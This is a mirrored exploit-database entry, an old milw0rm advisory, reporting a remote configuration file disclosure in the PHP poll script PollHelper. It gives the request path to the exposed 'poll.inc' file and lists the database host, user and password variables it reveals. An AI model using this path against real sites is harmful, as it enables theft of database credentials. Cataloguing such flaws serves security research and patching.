exploit-db-mirror/exploits/php/webapps/7690.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

26 lines
No EOL
739 B
Text

Remote Config File Disclosure
----------------------------------------------------
script: PollHelper
***************************************************************************
download from:http://www.freedville.com/oss/PollHelper.zip
***************************************************************************
vul:
www.site.com/path/poll.inc
...............................
$dbhost = "";
$dbusername = "";
$dbuserpass = "";
$default_dbname = ";
..............................
-------------------------------------------------
-------------------------------------------------
*************************************************
Author: ahmadbady
*************************************************
# milw0rm.com [2009-01-06]